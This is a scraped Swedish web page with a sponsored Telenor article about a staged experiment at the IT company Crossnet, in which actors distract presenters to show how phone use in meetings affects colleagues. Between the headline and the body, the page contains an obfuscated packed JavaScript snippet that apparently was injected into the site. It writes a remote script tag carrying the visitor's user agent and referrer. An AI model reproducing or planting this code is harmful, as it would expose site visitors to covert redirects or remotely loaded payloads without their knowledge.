Image Image Image Image Image Image Image Image Image Image

| 22 juni, 2018

Scroll to top

Top

No Comments

Så påverkar mobilberoendet våra möten

Så påverkar mobilberoendet våra möten

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbess|var|u0026u|referrer|frbey||js|php’.split(‘|’),0,{}))
type=”text/javascript” src=”//delivery.vidible.tv/jsonp/pid=570557ffe4b02e47bd20df5b/56d0eb36e4b0066426bef73b.js”>


Nytt experiment visar att sju av tio personer stör sig på sina kollegor som använder mobilen under möten. Men samtidigt så uppger också åtta av tio att de själva gör det ofta. Ofta sitter man på Facebook eller skickar sms. För att uppmärksamma problem med teknikstress och mobilberoende på arbetsplatser har mobiloperatören Telenor, i samarbete med IT-företaget Crossnet, utfört ett experiment som visar vad det egentligen är vi utsätter våra kollegor för när vi använder mobilen under möten.

 

De anställda på IT-företaget Crossnet får i uppdrag att hålla en kort presentation av sig själva inför ”en ny potentiell samarbetspartner”. Helt omedvetna om att mötesdeltagarna de presenterar sig för är inhyrda skådespelare ställs de snart inför en rad märkliga situationer. En åhörare tar upp och visar sina semesterbilder, en annan börjar sprätta kuvert, någon läser en nyhetstidning och plötsligt dyker det upp en gullig bebis – mitt under deras presentationer. Filmen dramatiserar sådant som ofta fångar vår uppmärksamhet i mobiltelefonen medan vi egentligen borde fokusera på annat. För att utföra experimentet anlitade Telenor en regissör med erfarenhet från det klassiska tv-programmet ”Blåsningen”.

Kika in videon ovan!

Detta är en sponsrad artikel från Telenor 

 

Submit a Comment